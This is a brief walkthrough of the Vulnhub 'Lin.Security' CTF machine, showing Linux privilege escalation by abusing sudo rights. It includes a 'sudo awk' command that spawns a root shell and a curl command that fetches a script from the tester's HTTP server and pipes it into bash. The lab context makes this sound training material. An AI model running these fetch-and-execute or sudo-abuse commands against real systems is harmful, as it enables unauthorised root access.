Lin.Security – Vulnhub CTF Challenge Walkthrough

Lin Security is available at Vulnhub. This VM is made for “Beginners” to master Privilege Escalation in Linux Environment using diverse range of techniques. There is no vulnerability in Kernel and you have to exploit Software misconfiguration vulnerabilities. SSH credentials for this machine are “bob: secret”, so there is no need to run Nmap scans.

Import this VM to Virtualbox and turn on.

Use netdiscover to determine the IP and register this IP to “/etc/hosts”.

 

Login to this machine through SSH using credentials “bob: secret”.

 

Type “sudo -l” to see the commands that user “bob” may run as root.

 

This is the list of commands that user “bob” may run as root. First, we’ll try to include the shell directly.

 

You can use “awk” to get root.

sudo awk 'BEGIN {system("/bin/bash")}'

 

Now, we’ll abuse curl to gain root privileges. We host a script on our Python Server.

echo #!/bin/bash > script.sh
echo "sudo /bin/bash" > script.sh
python -m SimpleHTTPServer 1234

 

Download the script using curl and execute it.

bash <(curl -s http://192.168.0.105:1234/script.sh)

 

There are a lot of ways to abuse these commands at https://gtfobins.github.io/, you can try them by yourself.

Want to learn more about ethical hacking?

We have a  networking hacking course that is of a similar level to OSCP, get an exclusive 95% discount HERE

Related posts

Hard-Coded Credentials Vulnerability Found In Kubernetes Image Builder

Critical Vulnerability Patched In Jetpack WordPress Plugin

Astaroth Banking Malware Runs Actively Targets Users In Brazil